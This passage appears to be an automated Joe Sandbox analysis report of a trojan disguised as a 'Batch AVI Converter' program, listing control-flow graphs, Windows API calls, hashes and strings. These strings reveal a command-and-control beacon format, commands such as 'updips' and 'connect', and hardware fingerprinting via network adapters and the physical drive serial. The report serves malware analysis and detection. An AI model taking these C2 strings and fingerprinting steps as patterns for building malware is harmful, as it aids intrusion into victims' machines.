21155->21154 21156 40b1cb GetProcAddress 21155->21156 21156->21151 21156->21155

                                                              Executed Functions

                                                              Function 02D872A7 Relevance: 95.2, APIs: 41, Strings: 13, Instructions: 659networksleepfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 2d872a7-2d872bf InternetOpenA 1 2d87385-2d8738b 0->1 2 2d872c5-2d8733c InternetSetOptionA * 3 call 2d94a20 InternetOpenUrlA 0->2 3 2d8738d-2d87393 1->3 4 2d873a7-2d873b5 1->4 15 2d8737e-2d8737f InternetCloseHandle 2->15 16 2d8733e 2->16 6 2d87399-2d873a6 call 2d853ec 3->6 7 2d87395-2d87397 3->7 8 2d873bb-2d873df call 2d94a20 call 2d8439c 4->8 9 2d866f0-2d866f2 4->9 6->4 7->4 8->9 33 2d873e5-2d87413 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d9226c 8->33 13 2d866fb-2d866fd 9->13 14 2d866f4-2d866f9 9->14 18 2d8670a-2d8673e RtlEnterCriticalSection RtlLeaveCriticalSection 13->18 19 2d866ff 13->19 21 2d86704 Sleep 14->21 15->1 22 2d87342-2d87368 InternetReadFile 16->22 25 2d8678e 18->25 26 2d86740-2d8674c 18->26 19->21 21->18 23 2d8736a-2d87371 22->23 24 2d87373-2d8737a InternetCloseHandle 22->24 23->22 24->15 29 2d86792 25->29 26->25 28 2d8674e-2d8675b 26->28 31 2d8675d-2d86761 28->31 32 2d86763-2d86764 28->32 29->0 35 2d86768-2d8678c call 2d94a20 * 2 31->35 32->35 38 2d87469-2d87484 call 2d9226c 33->38 39 2d87415-2d87427 call 2d9226c 33->39 35->29 47 2d8748a-2d8748c 38->47 48 2d8773e-2d87750 call 2d9226c 38->48 39->38 49 2d87429-2d8743b call 2d9226c 39->49 47->48 50 2d87492-2d87544 call 2d92edc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d94a20 * 5 call 2d8439c * 2 47->50 57 2d87799-2d877ab call 2d9226c 48->57 58 2d87752-2d87754 48->58 49->38 59 2d8743d-2d8744f call 2d9226c 49->59 112 2d87581 50->112 113 2d87546-2d87548 50->113 70 2d877cc-2d877de call 2d9226c 57->70 71 2d877ad-2d877c7 call 2d861f1 call 2d862ff call 2d8640a 57->71 58->57 61 2d87756-2d87794 call 2d94a20 RtlEnterCriticalSection RtlLeaveCriticalSection 58->61 59->38 72 2d87451-2d87463 call 2d9226c 59->72 61->9 81 2d87afc-2d87b0e call 2d9226c 70->81 82 2d877e4-2d877e6 70->82 71->9 72->9 72->38 81->9 94 2d87b14-2d87b42 call 2d92edc call 2d94a20 call 2d8439c 81->94 82->81 86 2d877ec-2d87803 call 2d8439c 82->86 86->9 98 2d87809-2d878d7 call 2d92348 call 2d81ba7 86->98 120 2d87b4b-2d87b52 call 2d92ea4 94->120 121 2d87b44-2d87b46 call 2d8534d 94->121 115 2d878d9 call 2d8143f 98->115 116 2d878de-2d878ff RtlEnterCriticalSection 98->116 122 2d87585-2d875b3 call 2d92edc call 2d94a20 call 2d8439c 112->122 113->112 119 2d8754a-2d8755c call 2d9226c 113->119 115->116 117 2d8790b-2d8796f RtlLeaveCriticalSection call 2d83c67 call 2d83d7e call 2d8826d 116->117 118 2d87901-2d87908 116->118 147 2d87ae3-2d87af7 call 2d88f35 117->147 148 2d87975-2d879bd call 2d8a657 117->148 118->117 119->112 135 2d8755e-2d8757f call 2d8439c 119->135 120->9 121->120 145 2d875f4-2d875fd call 2d92ea4 122->145 146 2d875b5-2d875c4 call 2d93516 122->146 135->122 157 2d87603-2d8761b call 2d93a7c 145->157 158 2d87734-2d87737 145->158 146->145 159 2d875c6 146->159 147->9 160 2d87aad-2d87ade call 2d8831c call 2d833b2 148->160 161 2d879c3-2d879ca 148->161 170 2d8761d-2d87625 call 2d89669 157->170 171 2d87627 157->171 158->48 163 2d875cb-2d875dd call 2d92780 159->163 160->147 165 2d879cd-2d879d2 161->165 178 2d875df 163->178 179 2d875e2-2d875f2 call 2d93516 163->179 165->165 169 2d879d4-2d87a1f call 2d8a657 165->169 169->160 180 2d87a25-2d87a2b 169->180 177 2d87629-2d876e1 call 2d8a781 call 2d83863 call 2d85119 call 2d83863 call 2d8aa27 call 2d8ab41 170->177 171->177 203 2d876e8-2d87713 Sleep call 2d91820 177->203 204 2d876e3 call 2d8380b 177->204 178->179 179->145 179->163 184 2d87a2e-2d87a33 180->184 184->184 187 2d87a35-2d87a70 call 2d8a657 184->187 187->160 193 2d87a72-2d87aac call 2d8d049 187->193 193->160 208 2d8771f-2d8772d 203->208 209 2d87715-2d8771e call 2d84100 203->209 204->203 208->158 211 2d8772f call 2d8380b 208->211 209->208 211->158
                                                              APIs
                                                              • Sleep.KERNEL32(0000EA60), ref: 02D86704
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D8670F
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D86720
                                                              • _memset.LIBCMT ref: 02D86775
                                                              • _memset.LIBCMT ref: 02D86784
                                                              • InternetOpenA.WININET(?), ref: 02D872B1
                                                              • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02D872D9
                                                              • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02D872F1
                                                              • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02D87309
                                                              • _memset.LIBCMT ref: 02D87319
                                                              • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02D87332
                                                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02D87354
                                                              • InternetCloseHandle.WININET(00000000), ref: 02D87374
                                                              • InternetCloseHandle.WININET(00000000), ref: 02D8737F
                                                              • _memset.LIBCMT ref: 02D873C7
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D873EA
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D873FB
                                                              • _malloc.LIBCMT ref: 02D87494
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D874A6
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D874B2
                                                              • _memset.LIBCMT ref: 02D874CC
                                                              • _memset.LIBCMT ref: 02D874DB
                                                              • _memset.LIBCMT ref: 02D874EB
                                                              • _memset.LIBCMT ref: 02D874FE
                                                              • _memset.LIBCMT ref: 02D87514
                                                              • _malloc.LIBCMT ref: 02D8758A
                                                              • _memset.LIBCMT ref: 02D8759B
                                                              • _strtok.LIBCMT ref: 02D875BB
                                                              • _swscanf.LIBCMT ref: 02D875D2
                                                              • _strtok.LIBCMT ref: 02D875E9
                                                              • _free.LIBCMT ref: 02D875F5
                                                              • Sleep.KERNEL32(000007D0), ref: 02D876ED
                                                              • _memset.LIBCMT ref: 02D87761
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D8776E
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D87780
                                                              • _sprintf.LIBCMT ref: 02D8781E
                                                              • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D878E2
                                                              • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D87916
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                              • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                              • API String ID: 696907137-1839899575
                                                              • Opcode ID: 65bd05677515805f772be527574944a30ffab501461eabc8fbd971d4768a69b6
                                                              • Instruction ID: e72acf4f06556ed4c79325a8b87c6856e2e1504b7763b0fd91a5f273a38d103e
                                                              • Opcode Fuzzy Hash: 65bd05677515805f772be527574944a30ffab501461eabc8fbd971d4768a69b6
                                                              • Instruction Fuzzy Hash: 5432FE32548381AFE724AB24D855FAFBBE6EF85714F10081DF58A97390DB719C04CBA6
                                                              Function 02D86487 Relevance: 82.5, APIs: 42, Strings: 5, Instructions: 228memorysleeplibraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 214 2d86487-2d866ed RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2d842c7 GetTickCount call 2d8605a GetVersionExA call 2d94a20 call 2d92edc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d94a20 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d92edc * 4 QueryPerformanceCounter Sleep call 2d92edc * 2 call 2d94a20 * 2 259 2d866f0-2d866f2 214->259 260 2d866fb-2d866fd 259->260 261 2d866f4-2d866f9 259->261 262 2d8670a-2d8673e RtlEnterCriticalSection RtlLeaveCriticalSection 260->262 263 2d866ff 260->263 264 2d86704 Sleep 261->264 265 2d8678e 262->265 266 2d86740-2d8674c 262->266 263->264 264->262 268 2d86792-2d872bf InternetOpenA 265->268 266->265 267 2d8674e-2d8675b 266->267 269 2d8675d-2d86761 267->269 270 2d86763-2d86764 267->270 273 2d87385-2d8738b 268->273 274 2d872c5-2d8733c InternetSetOptionA * 3 call 2d94a20 InternetOpenUrlA 268->274 272 2d86768-2d8678c call 2d94a20 * 2 269->272 270->272 272->268 275 2d8738d-2d87393 273->275 276 2d873a7-2d873b5 273->276 287 2d8737e-2d8737f InternetCloseHandle 274->287 288 2d8733e 274->288 279 2d87399-2d873a6 call 2d853ec 275->279 280 2d87395-2d87397 275->280 276->259 282 2d873bb-2d873df call 2d94a20 call 2d8439c 276->282 279->276 280->276 282->259 297 2d873e5-2d87413 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d9226c 282->297 287->273 292 2d87342-2d87368 InternetReadFile 288->292 293 2d8736a-2d87371 292->293 294 2d87373-2d8737a InternetCloseHandle 292->294 293->292 294->287 300 2d87469-2d87484 call 2d9226c 297->300 301 2d87415-2d87427 call 2d9226c 297->301 306 2d8748a-2d8748c 300->306 307 2d8773e-2d87750 call 2d9226c 300->307 301->300 308 2d87429-2d8743b call 2d9226c 301->308 306->307 309 2d87492-2d87544 call 2d92edc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d94a20 * 5 call 2d8439c * 2 306->309 316 2d87799-2d877ab call 2d9226c 307->316 317 2d87752-2d87754 307->317 308->300 318 2d8743d-2d8744f call 2d9226c 308->318 371 2d87581 309->371 372 2d87546-2d87548 309->372 329 2d877cc-2d877de call 2d9226c 316->329 330 2d877ad-2d877bb call 2d861f1 call 2d862ff 316->330 317->316 320 2d87756-2d87794 call 2d94a20 RtlEnterCriticalSection RtlLeaveCriticalSection 317->320 318->300 331 2d87451-2d87463 call 2d9226c 318->331 320->259 340 2d87afc-2d87b0e call 2d9226c 329->340 341 2d877e4-2d877e6 329->341 347 2d877c0-2d877c7 call 2d8640a 330->347 331->259 331->300 340->259 353 2d87b14-2d87b42 call 2d92edc call 2d94a20 call 2d8439c 340->353 341->340 345 2d877ec-2d87803 call 2d8439c 341->345 345->259 357 2d87809-2d878d7 call 2d92348 call 2d81ba7 345->357 347->259 379 2d87b4b-2d87b52 call 2d92ea4 353->379 380 2d87b44-2d87b46 call 2d8534d 353->380 374 2d878d9 call 2d8143f 357->374 375 2d878de-2d878ff RtlEnterCriticalSection 357->375 381 2d87585-2d875b3 call 2d92edc call 2d94a20 call 2d8439c 371->381 372->371 378 2d8754a-2d8755c call 2d9226c 372->378 374->375 376 2d8790b-2d8796f RtlLeaveCriticalSection call 2d83c67 call 2d83d7e call 2d8826d 375->376 377 2d87901-2d87908 375->377 406 2d87ae3-2d87af7 call 2d88f35 376->406 407 2d87975-2d879bd call 2d8a657 376->407 377->376 378->371 394 2d8755e-2d8757f call 2d8439c 378->394 379->259 380->379 404 2d875f4-2d875fd call 2d92ea4 381->404 405 2d875b5-2d875c4 call 2d93516 381->405 394->381 416 2d87603-2d8761b call 2d93a7c 404->416 417 2d87734-2d87737 404->417 405->404 418 2d875c6 405->418 406->259 419 2d87aad-2d87ade call 2d8831c call 2d833b2 407->419 420 2d879c3-2d879ca 407->420 429 2d8761d-2d87625 call 2d89669 416->429 430 2d87627 416->430 417->307 422 2d875cb-2d875dd call 2d92780 418->422 419->406 424 2d879cd-2d879d2 420->424 437 2d875df 422->437 438 2d875e2-2d875f2 call 2d93516 422->438 424->424 428 2d879d4-2d87a1f call 2d8a657 424->428 428->419 439 2d87a25-2d87a2b 428->439 436 2d87629-2d876e1 call 2d8a781 call 2d83863 call 2d85119 call 2d83863 call 2d8aa27 call 2d8ab41 429->436 430->436 462 2d876e8-2d87713 Sleep call 2d91820 436->462 463 2d876e3 call 2d8380b 436->463 437->438 438->404 438->422 443 2d87a2e-2d87a33 439->443 443->443 446 2d87a35-2d87a70 call 2d8a657 443->446 446->419 452 2d87a72-2d87aac call 2d8d049 446->452 452->419 467 2d8771f-2d8772d 462->467 468 2d87715-2d8771e call 2d84100 462->468 463->462 467->417 470 2d8772f call 2d8380b 467->470 468->467 470->417
                                                              APIs
                                                              • RtlInitializeCriticalSection.NTDLL(02DB71B8), ref: 02D864B6
                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D864CD
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02D864D6
                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D864E5
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02D864E8
                                                              • GetTickCount.KERNEL32 ref: 02D864F4
                                                                • Part of subcall function 02D8605A: _malloc.LIBCMT ref: 02D86068
                                                              • GetVersionExA.KERNEL32(02DB7010), ref: 02D86521
                                                              • _memset.LIBCMT ref: 02D86540
                                                              • _malloc.LIBCMT ref: 02D8654D
                                                                • Part of subcall function 02D92EDC: __FF_MSGBANNER.LIBCMT ref: 02D92EF3
                                                                • Part of subcall function 02D92EDC: __NMSG_WRITE.LIBCMT ref: 02D92EFA
                                                                • Part of subcall function 02D92EDC: RtlAllocateHeap.NTDLL(00730000,00000000,00000001), ref: 02D92F1F
                                                              • _malloc.LIBCMT ref: 02D8655D
                                                              • _malloc.LIBCMT ref: 02D86568
                                                              • _malloc.LIBCMT ref: 02D86573
                                                              • _malloc.LIBCMT ref: 02D8657E
                                                              • _malloc.LIBCMT ref: 02D86589
                                                              • _malloc.LIBCMT ref: 02D86594
                                                              • _malloc.LIBCMT ref: 02D865A3
                                                              • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D865BA
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02D865C3
                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D865D2
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02D865D5
                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D865E0
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02D865E3
                                                              • _memset.LIBCMT ref: 02D865F6
                                                              • _memset.LIBCMT ref: 02D86602
                                                              • _memset.LIBCMT ref: 02D8660F
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D8661D
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D8662A
                                                              • _malloc.LIBCMT ref: 02D8664E
                                                              • _malloc.LIBCMT ref: 02D8665C
                                                              • _malloc.LIBCMT ref: 02D86663
                                                              • _malloc.LIBCMT ref: 02D86689
                                                              • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D8669C
                                                              • Sleep.KERNEL32 ref: 02D866AA
                                                              • _malloc.LIBCMT ref: 02D866B6
                                                              • _malloc.LIBCMT ref: 02D866C3
                                                              • _memset.LIBCMT ref: 02D866D8
                                                              • _memset.LIBCMT ref: 02D866E8
                                                              • Sleep.KERNEL32(0000EA60), ref: 02D86704
                                                              • RtlEnterCriticalSection.NTDLL(02DB71B8), ref: 02D8670F
                                                              • RtlLeaveCriticalSection.NTDLL(02DB71B8), ref: 02D86720
                                                              • _memset.LIBCMT ref: 02D86775
                                                              • _memset.LIBCMT ref: 02D86784
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                              • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                              • API String ID: 2251652938-2678694477
                                                              • Opcode ID: eb357410cbc05182669a9a3160f303a1c393ed0f626fe854e3b4919b2a7cfad5
                                                              • Instruction ID: 47945c44aead18ae0cdf70b63b1e2177777b0cf653a001184a518ba7c2f0695f
                                                              • Opcode Fuzzy Hash: eb357410cbc05182669a9a3160f303a1c393ed0f626fe854e3b4919b2a7cfad5
                                                              • Instruction Fuzzy Hash: 4A719172D48340AFE710AF30AC49B5FBBE9EF85754F100819F98597781DAB49C41CBAA
                                                              Function 0040223D Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 117librarystringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 473 40223d-402258 474 40225a-40225f 473->474 475 4021de-402313 473->475 477 402261-402271 474->477 478 4022bd 474->478 483 40b9fd-40b9fe 475->483 479 40b176-40b179 477->479 480 402277-402647 lstrcmpiW 477->480 481 4022c7-4022ca 478->481 482 4022bf 478->482 484 40b1e6-40b1ee StartServiceCtrlDispatcherA 479->484 489 40b268 480->489 482->481 486 402286-402296 LoadLibraryExA 482->486 495 40ba09-40ba25 call 402bc0 483->495 492 40b1ff 484->492 487 40b7c5 486->487 493 40b7cb-40b7ce 487->493 494 40269f-4026b0 487->494 491 40b26e-40b26f 489->491 489->492 491->495 492->489 493->494 496 4026b3-4026bc 494->496 498 4026c2-4026c7 496->498 499 40b1a9-40b1c6 496->499 498->479 502 40b940 498->502 505 40b4d8 499->505 503 40b946 502->503 504 40259e-40b2a4 502->504 503->483 504->505 509 40b1cb-40b1e1 GetProcAddress 504->509 507 40b7a4-40b7a7 505->507 508 40b4de-40b4e1 505->508 507->487 510 40b799 508->510 509->484 509->510 510->496 510->507
                                                              APIs
                                                              • LoadLibraryExA.KERNEL32(?), ref: 00402286
                                                              • lstrcmpiW.KERNEL32(?,/chk), ref: 0040263F
                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040B1E7
                                                              Strings
                                                              • /chk, xrefs: 00402277
                                                              • XiM#, xrefs: 0040226C
                                                              • C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe, xrefs: 0040B9FD
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CtrlDispatcherLibraryLoadServiceStartlstrcmpi
                                                              • String ID: /chk$C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe$XiM#
                                                              • API String ID: 2103646607-4002683248
                                                              • Opcode ID: c5a8441475130b9a7a8130812834b89ae97cd73147b0c6c9a1a4b3381dc2569d
                                                              • Instruction ID: 8bf7aede9d04df03068851b22dc39cddd4f593d1d8b98ea544a71e6f5e574920
                                                              • Opcode Fuzzy Hash: c5a8441475130b9a7a8130812834b89ae97cd73147b0c6c9a1a4b3381dc2569d
                                                              • Instruction Fuzzy Hash: 7D31E074908212DFCB118F60CA986A637A4FF05350F2045BBE912BB2C1D7BDD9169B9E
                                                              Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 735 401b4b-401b68 LoadLibraryA 736 401c21-401c25 735->736 737 401b6e-401b7f GetProcAddress 735->737 738 401b85-401b8e 737->738 739 401c18-401c1b FreeLibrary 737->739 740 401b95-401ba5 GetAdaptersInfo 738->740 739->736 741 401ba7-401bb0 740->741 742 401bdb-401be3 740->742 743 401bc1-401bd7 call 402bc0 call 4018cc 741->743 744 401bb2-401bb6 741->744 745 401be5-401beb call 402ba6 742->745 746 401bec-401bf0 742->746 743->742 744->742 749 401bb8-401bbf 744->749 745->746 747 401bf2-401bf6 746->747 748 401c15-401c17 746->748 747->748 753 401bf8-401bfb 747->753 748->739 749->743 749->744 755 401c06-401c13 call 402b98 753->755 756 401bfd-401c03 753->756 755->740 755->748 756->755
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00401B5D
                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                              • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                              • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                              • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                              • API String ID: 514930453-3667123677
                                                              • Opcode ID: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                              • Instruction ID: 9300e3b8f0653b0f10764aaa79a1f2494f67c894d04353eb45b18fdb2f867aae
                                                              • Opcode Fuzzy Hash: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
                                                              • Instruction Fuzzy Hash: 9621B870944109AFEF11DF65C944BEF7BB8EF41344F1440BAE504B22E1E778A985CB69
                                                              Function 02D8F8D9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 786 2d8f8d9-2d8f8fc LoadLibraryA 787 2d8f9bc-2d8f9c3 786->787 788 2d8f902-2d8f910 GetProcAddress 786->788 789 2d8f9b5-2d8f9b6 FreeLibrary 788->789 790 2d8f916-2d8f926 788->790 789->787 791 2d8f928-2d8f934 GetAdaptersInfo 790->791 792 2d8f96c-2d8f974 791->792 793 2d8f936 791->793 794 2d8f97d-2d8f982 792->794 795 2d8f976-2d8f97c call 2d936d8 792->795 796 2d8f938-2d8f93f 793->796 798 2d8f9b0-2d8f9b4 794->798 799 2d8f984-2d8f987 794->799 795->794 800 2d8f949-2d8f951 796->800 801 2d8f941-2d8f945 796->801 798->789 799->798 804 2d8f989-2d8f98e 799->804 802 2d8f954-2d8f959 800->802 801->796 805 2d8f947 801->805 802->802 806 2d8f95b-2d8f968 call 2d8f628 802->806 807 2d8f99b-2d8f9a6 call 2d93a7c 804->807 808 2d8f990-2d8f998 804->808 805->792 806->792 807->798 813 2d8f9a8-2d8f9ab 807->813 808->807 813->791
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D8F8EF
                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D8F908
                                                              • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D8F92D
                                                              • FreeLibrary.KERNEL32(00000000), ref: 02D8F9B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                              • String ID: GetAdaptersInfo$iphlpapi.dll
                                                              • API String ID: 514930453-3114217049
                                                              • Opcode ID: 62fad148241a5eb0597d608fcd14fcc773a49a4c4018dfb838e4550dfcfd76f6
                                                              • Instruction ID: 28c1898e6df3084b43820342bb2d8679745a56775217f45e493826d20d7dcb81
                                                              • Opcode Fuzzy Hash: 62fad148241a5eb0597d608fcd14fcc773a49a4c4018dfb838e4550dfcfd76f6
                                                              • Instruction Fuzzy Hash: FF21A271A04219AFDB10FBA8D884AEEBBB8EF05310F5540AAE545E7700DB348D45CBA4
                                                              Function 02D8F7D5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 814 2d8f7d5-2d8f800 CreateFileA 815 2d8f8d1-2d8f8d8 814->815 816 2d8f806-2d8f81b 814->816 817 2d8f81e-2d8f840 DeviceIoControl 816->817 818 2d8f879-2d8f881 817->818 819 2d8f842-2d8f84a 817->819 820 2d8f88a-2d8f88c 818->820 821 2d8f883-2d8f889 call 2d936d8 818->821 822 2d8f84c-2d8f851 819->822 823 2d8f853-2d8f858 819->823 825 2d8f88e-2d8f891 820->825 826 2d8f8c7-2d8f8d0 CloseHandle 820->826 821->820 822->818 823->818 827 2d8f85a-2d8f862 823->827 829 2d8f8ad-2d8f8ba call 2d93a7c 825->829 830 2d8f893-2d8f89c GetLastError 825->830 826->815 831 2d8f865-2d8f86a 827->831 829->826 839 2d8f8bc-2d8f8c2 829->839 830->826 832 2d8f89e-2d8f8a1 830->832 831->831 834 2d8f86c-2d8f878 call 2d8f628 831->834 832->829 836 2d8f8a3-2d8f8aa 832->836 834->818 836->829 839->817
                                                              APIs
                                                              • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D8F7F4
                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D8F832
                                                              • GetLastError.KERNEL32 ref: 02D8F893
                                                              • CloseHandle.KERNEL32(?), ref: 02D8F8CA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                              • String ID: \\.\PhysicalDrive0
                                                              • API String ID: 4026078076-1180397377
                                                              • Opcode ID: a67ddbdf22d80fbf8241824f980d04bc5dc4162f762d52a03dccccfb53466e3b
                                                              • Instruction ID: 498aa458b4a1ceae14dd21f7c2a57c9ec2e977264ce748c8c819ae9b206a0475
                                                              • Opcode Fuzzy Hash: a67ddbdf22d80fbf8241824f980d04bc5dc4162f762d52a03dccccfb53466e3b
                                                              • Instruction Fuzzy Hash: AA31A1B1E00219AFDB14EFA5D884BAEBBB9FF04754F70416AE505A3780D7709E04CB94
                                                              Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 840 401a4f-401a77 CreateFileA 841 401b45-401b4a 840->841 842 401a7d-401a91 840->842 843 401a98-401ac0 DeviceIoControl 842->843 844 401ac2-401aca 843->844 845 401af3-401afb 843->845 848 401ad4-401ad9 844->848 849 401acc-401ad2 844->849 846 401b04-401b07 845->846 847 401afd-401b03 call 402ba6 845->847 852 401b09-401b0c 846->852 853 401b3a-401b44 CloseHandle 846->853 847->846 848->845 850 401adb-401af1 call 402bc0 call 4018cc 848->850 849->845 850->845 856 401b27-401b34 call 402b98 852->856 857 401b0e-401b17 GetLastError 852->857 853->841 856->843 856->853 857->853 859 401b19-401b1c 857->859 859->856 863 401b1e-401b24 859->863 863->856
                                                              APIs
                                                              • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                              • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                              • GetLastError.KERNEL32 ref: 00401B0E
                                                              • CloseHandle.KERNEL32(?), ref: 00401B3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
